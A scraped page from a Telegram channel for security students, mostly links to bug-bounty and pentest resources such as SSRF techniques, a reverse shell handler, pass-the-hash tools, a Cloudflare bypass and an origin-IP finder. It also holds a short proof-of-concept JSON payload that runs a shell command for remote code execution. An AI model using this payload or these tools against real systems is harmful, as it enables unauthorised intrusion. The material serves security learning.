SecList for CyberStudents – Telegram

SecList for CyberStudents

@SecListForCyberStudents

239 subscribers

581 photos

23 videos

211 files

893 links

Think outside the box

Download Telegram

About

Blog

Apps

Platform

SecList for CyberStudents

239 subscribers

SecList for CyberStudents

I'm going to write about a piece of malware that appears under the name "kaudit0." I did some research, and all the information I found indicates that its purpose is crypto-mining. There isn't much information available about it, but what does exist appears to be credible.

#malware

117 views08:15

SecList for CyberStudents

https://medium.com/@Aacle/ssrf-part-3-advanced-tricks-timing-channels-out-of-the-box-detection-693c07c97015

SSRF — Part 3: Advanced Tricks, Timing Channels & Out-of-the-Box Detection 🚀

Subtitle: The secret-sauce volume for bug bounty hunters — defensive-first, high-signal techniques that convert sketchy SSRF signs into…

105 views05:09

SecList for CyberStudents

https://infosecwriteups.com/how-we-discovered-a-stored-html-injection-in-a-chatbot-system-%EF%B8%8F-6cbefe8b0718

How We Discovered a Stored HTML Injection in a Chatbot System 🕷️

What happens when you feed HTML to a hungry chatbot? Spoiler: It gets digested without question!

114 views08:26

SecList for CyberStudents

https://github.com/rahmansec/SecretHunter

GitHub - rahmansec/SecretHunter: A powerful and lightweight tool for bug bounty hunters and security researchers to identify hardcoded…

A powerful and lightweight tool for bug bounty hunters and security researchers to identify hardcoded secrets, API keys, tokens, credentials, and other sensitive data in code repositories, web appl...

105 views14:14

SecList for CyberStudents

https://github.com/coffinxp/lostfuzzer

GitHub - coffinxp/lostfuzzer: A Bash script for automated nuclei dast scanning by using passive urls

A Bash script for automated nuclei dast scanning by using passive urls - coffinxp/lostfuzzer

84 views11:40

SecList for CyberStudents

https://www.youtube.com/watch?v=x2Nm7jCmoVA

How I legally hacked British Airways (Live Bug Bounty Hunting And Recon)

This video was originally taken down, after extensive research of youtube's terms I have re-uploaded a highly modified version to be compliant with all terms, to YouTube staff and automated moderators, please take note of all disclaimers etc and CONTACT ME…

86 views12:00

SecList for CyberStudents

https://github.com/malwarekid/OnlyShell

GitHub - malwarekid/OnlyShell: A powerful Go-based multi-shell handler for managing multiple reverse shell connections simultaneously…

A powerful Go-based multi-shell handler for managing multiple reverse shell connections simultaneously with features like shell type detection, background management, command broadcasting, and real...

133 views15:01

SecList for CyberStudents

POC:
{
  "name": "darkshadow",
  "args": {},
  "json_schema": {"type": "object", "properties": {}},
"source_code": "def darkshadow():\n    import os\n    data='0'.encode('utf-8')\n    return ''+os.popen('id').read()"
}

#BugBounty #RCE

🔥1

90 views21:05

SecList for CyberStudents

https://github.com/Invicti-Security/brainstorm?s=09

GitHub - Invicti-Security/brainstorm: A smarter web fuzzing tool that combines local LLM models and ffuf to optimize directory…

A smarter web fuzzing tool that combines local LLM models and ffuf to optimize directory and file discovery - Invicti-Security/brainstorm

96 views21:20

SecList for CyberStudents

https://youtu.be/kb_scuDUHls?si=MQX9Rz5UlFueqDW5

Cryptography for Beginners - Full Python Course (SHA-256, AES, RSA, Passwords)

Learn about cryptography in this beginner's course. You'll learn essential techniques like hashing (SHA-256) for verifying file integrity, symmetric encryption (AES), and asymmetric encryption (RSA) using public and private keys. The practical focus of the…

96 views09:35

SecList for CyberStudents

https://learn.microsoft.com/en-us/archive/blogs/canitpro/step-by-step-enabling-advanced-security-audit-policy-via-ds-access

Step-By-Step: Enabling Advanced Security Audit Policy via DS Access

86 views10:33

SecList for CyberStudents

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces

Abusing Active Directory ACLs/ACEs | Red Team Notes

92 views12:15

SecList for CyberStudents

https://github.com/byt3bl33d3r/pth-toolkit

GitHub - byt3bl33d3r/pth-toolkit: Modified version of the passing-the-hash tool collection made to work straight out of the box

Modified version of the passing-the-hash tool collection made to work straight out of the box - byt3bl33d3r/pth-toolkit

101 views12:27

SecList for CyberStudents

https://github.com/Arcanum-Sec/hack_tips/blob/main/403bypass.md

hack_tips/403bypass.md at main · Arcanum-Sec/hack_tips

Contribute to Arcanum-Sec/hack_tips development by creating an account on GitHub.

102 views09:44

SecList for CyberStudents

https://codeby.net/threads/metodika-veb-pentesta-poshagovyi-plan-poiska-uyazvimostei-v-prilozhenii-dlya-nachinayushchikh.85912/

Форум информационной безопасности - Codeby.net

Веб-пентест: полное руководство по тестированию безопасности

Научитесь эффективно проводить веб-пентест, выявлять уязвимости и тестировать безопасность приложений. Подробное пошаговое руководство.

93 views11:42

SecList for CyberStudents

https://github.com/juliocesarfort/public-pentesting-reports/tree/master

GitHub - juliocesarfort/public-pentesting-reports: A list of public penetration test reports published by several consulting firms…

A list of public penetration test reports published by several consulting firms and academic security groups. - juliocesarfort/public-pentesting-reports

127 views12:01

SecList for CyberStudents

Cloudflare has started blocking proxy tools like Burp Suite. If you encounter this error, download the “Bypass Bot Detection” extension from the BApp Store in Burp Suite. It should resolve the issue for Burp Suite.

#Cloudflare #Pentest #BugBounty #from_X

309 viewsedited 12:54

SecList for CyberStudents

https://github.com/FuzzingLabs/fuzzforge_ai

GitHub - FuzzingLabs/fuzzforge_ai: AI-powered workflow automation and AI Agents platform for AppSec, Fuzzing & Offensive Security.…

AI-powered workflow automation and AI Agents platform for AppSec, Fuzzing & Offensive Security. Automate vulnerability discovery with intelligent fuzzing, AI-driven analysis, and a marketpl...

110 views13:00

SecList for CyberStudents

https://github.com/staxsum/CloudRip

GitHub - moscovium-mc/CloudRip: A tool that helps you find the real IP addresses hiding behind Cloudflare by checking subdomains.

A tool that helps you find the real IP addresses hiding behind Cloudflare by checking subdomains. - GitHub - moscovium-mc/CloudRip: A tool that helps you find the real IP addresses hiding behind C...

94 views13:08